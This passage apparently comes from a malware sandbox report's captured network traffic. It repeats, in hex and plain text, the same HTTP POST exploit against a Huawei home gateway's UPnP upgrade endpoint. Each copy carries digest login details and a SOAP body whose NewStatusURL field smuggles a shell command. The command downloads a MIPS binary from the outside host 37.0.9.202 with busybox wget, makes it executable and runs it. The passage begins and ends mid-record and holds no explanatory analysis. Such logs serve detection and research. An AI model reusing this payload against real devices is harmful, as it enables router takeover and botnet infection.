73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 